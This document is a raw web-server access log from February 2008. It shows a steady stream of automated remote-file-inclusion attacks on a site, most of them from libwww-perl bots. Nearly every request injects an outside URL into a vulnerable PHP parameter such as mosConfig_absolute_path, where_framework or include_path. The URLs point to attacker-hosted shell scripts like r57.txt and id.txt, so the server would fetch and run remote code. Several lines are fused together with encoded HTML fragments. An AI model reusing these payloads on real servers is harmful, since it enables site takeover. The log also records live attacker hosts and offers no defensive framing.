64.211.107.26 - - [25/Feb/2008:07:34:17 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:34:58 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:34:58 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:34:58 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:07:35:01 -0800] "GET //functions.php?include_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:07:35:01 -0800] "GET /logs//functions.php?include_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:35:25 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.91 - - [25/Feb/2008:07:36:00 -0800] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.19.3.162 - - [25/Feb/2008:07:36:14 -0800] "GET /logs/access_071225.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.202.202 - - [25/Feb/2008:07:36:14 -0800] "GET /logs//errors.php?error=http://www.spree-boom.de/html/.../contrB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
89.19.3.162 - - [25/Feb/2008:07:36:15 -0800] "GET /logs/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.202.202 - - [25/Feb/2008:07:36:18 -0800] "GET //errors.php?error=http://www.spree-boom.de/html/.../contrB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:07:36:20 -0800] "GET /logs/access.log/phpsecurityadmin/include/logout.php?PSA_PATH=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:36:29 -0800] "GET /logs/access.log//update/update5.php?lang=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:36:30 -0800] "GET /logs//update/update5.php?lang=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:07:36:31 -0800] "GET /modules/inc/E_gallery.index/php=%22e_gallery.php%22http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:07:36:32 -0800] "GET /logs/modules/inc/E_gallery.index/php=%22e_gallery.php%22http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:07:36:32 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:36:32 -0800] "GET /logs/access_080201.log//update/update5.php?lang=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:07:36:32 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:07:36:32 -0800] "GET /logs/access_080123.log/index.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
211.234.116.170 - - [25/Feb/2008:07:36:32 -0800] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:07:36:32 -0800] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:07:36:33 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.74.120.24 - - [25/Feb/2008:07:36:37 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.74.120.24 - - [25/Feb/2008:07:36:38 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.19.3.162 - - [25/Feb/2008:07:36:40 -0800] "GET /logs/access_080121.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.74.120.24 - - [25/Feb/2008:07:36:44 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:07:37:02 -0800] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:07:37:03 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:07:37:03 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.29.37 - - [25/Feb/2008:07:37:07 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:37:09 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:37:09 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:37:09 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.19.18 - - [25/Feb/2008:07:37:31 -0800] "GET /logs/access_080201.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22%2F%3FmosConfig_absolute_path%3D%22&u=www.dmulk.com/logs/access_080201.log&w=mosconfig_absolute_path&d=RLi_rHDuQWje&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.raiseyourpulse.com/reports/log.details.html%22%20%3EAccess%20Details%20Report:%20Raise%20Your%20Pulse%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20configinsert.php?mosConfig_absolute_path=http:/communityflow.com%20...%2002:53:05%20--%20--%20/?index.php?mosConfig_absolute_path=http:/sbn.poilpark.net/docu/id.txt?%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.raiseyourpulse.com/reports/log.details.html%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22%2Fwinningtel/us2:91.19.23175.126.19.18 - - [25/Feb/2008:07:37:31 -0800] "GET /logs/access_080201.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22%2F%3FmosConfig_absolute_path%3D%22&u=www.dmulk.com/logs/access_080201.log&w=mosconfig_absolute_path&d=RLi_rHDuQWje&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.raiseyourpulse.com/reports/log.details.html%22%20%3EAccess%20Details%20Report:%20Raise%20Your%20Pulse%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20configinsert.php?mosConfig_absolute_path=http:/communityflow.com%20...%2002:53:05%20--%20--%20/?index.php?mosConfig_absolute_path=http:/sbn.poilpark.net/docu/id.txt?%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.raiseyourpulse.com/reports/log.details.html%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22%2Fcpocommerce2000/us22:20575.126.19.18 - - [25/Feb/2008:07:37:32 -0800] "GET //?mosConfig_absolute_path=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 200 3094 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
75.126.19.18 - - [25/Feb/2008:07:37:32 -0800] "GET /errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
75.126.19.18 - - [25/Feb/2008:07:37:32 -0800] "GET /logs/access_080201.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22%2F%3FmosConfig_absolute_path%3D%22&u=www.dmulk.com/logs/access_080201.log&w=mosconfig_absolute_path&d=RLi_rHDuQWje&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.raiseyourpulse.com/reports/log.details.html%22%20%3EAccess%20Details%20Report:%20Raise%20Your%20Pulse%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20configinsert.php?mosConfig_absolute_path=http:/communityflow.com%20...%2002:53:05%20--%20--%20/?index.php?mosConfig_absolute_path=http:/sbn.poilpark.net/docu/id.txt?%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.raiseyourpulse.com/reports/log.details.html%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22%2Fcaverdoug/us1:63.88.40.175.126.19.18 - - [25/Feb/2008:07:37:32 -0800] "GET /logs/access_080201.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22%2F%3FmosConfig_absolute_path%3D%22&u=www.dmulk.com/logs/access_080201.log&w=mosconfig_absolute_path&d=RLi_rHDuQWje&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.raiseyourpulse.com/reports/log.details.html%22%20%3EAccess%20Details%20Report:%20Raise%20Your%20Pulse%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20configinsert.php?mosConfig_absolute_path=http:/communityflow.com%20...%2002:53:05%20--%20--%20/?index.php?mosConfig_absolute_path=http:/sbn.poilpark.net/docu/id.txt?%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.raiseyourpulse.com/reports/log.details.html%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22%2Fmtberseth/us1:213.249.19211.233.19.105 - - [25/Feb/2008:07:37:42 -0800] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:07:37:42 -0800] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:07:38:34 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.237 - - [25/Feb/2008:07:38:44 -0800] "GET /tmp/mailError.log HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:07:38:46 -0800] "GET /logs/access.log//update/update5.php?lang=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:07:38:46 -0800] "GET //update/update5.php?lang=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:07:38:46 -0800] "GET /logs/access.log/update/update5.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:07:38:47 -0800] "GET /logs//update/update5.php?lang=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:07:38:47 -0800] "GET /update/update5.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [25/Feb/2008:07:38:47 -0800] "GET /logs/update/update5.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:07:38:48 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:07:38:49 -0800] "GET /logs/access_080128.log/index.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:07:38:54 -0800] "GET /logs/access_080201.log//update/update5.php?lang=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:07:38:55 -0800] "GET /logs/access_080201.log/update/update5.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
91.192.194.37 - - [25/Feb/2008:07:39:52 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:07:40:06 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://avvvv.altervista.org/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:40:21 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:40:21 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:40:21 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:07:40:42 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.67.190 - - [25/Feb/2008:07:40:49 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.67.190 - - [25/Feb/2008:07:40:49 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.67.190 - - [25/Feb/2008:07:40:49 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.58.22 - - [25/Feb/2008:07:41:24 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.58.22 - - [25/Feb/2008:07:41:25 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.58.22 - - [25/Feb/2008:07:42:06 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.67.190 - - [25/Feb/2008:07:43:34 -0800] "GET /logs/access_080107.log//faqsupport/samplefaqsupport.php?path[docroot]=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.102.6 - - [25/Feb/2008:07:46:22 -0800] "GET /logs/access_080201.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/ntchack/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.102.6 - - [25/Feb/2008:07:46:23 -0800] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/ntchack/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:07:46:40 -0800] "GET /squirrelcart/popup_window.php?site_isp_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:07:46:45 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:47:38 -0800] "GET /logs/access_080131.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:47:43 -0800] "GET //Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:47:49 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:49:06 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:49:07 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:49:08 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:49:08 -0800] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:49:18 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:49:18 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:49:19 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.154 - - [25/Feb/2008:07:49:43 -0800] "GET /tmp/?N=A HTTP/1.0" 200 1488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:49:56 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:49:57 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:49:57 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:50:40 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:50:40 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:50:40 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:07:50:45 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:51:07 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:51:09 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:51:23 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:51:23 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:51:23 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:51:37 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:51:38 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:07:51:38 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.11 - - [25/Feb/2008:07:52:03 -0800] "GET /logs/access_071030.log HTTP/1.0" 200 28194 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:52:26 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:52:26 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
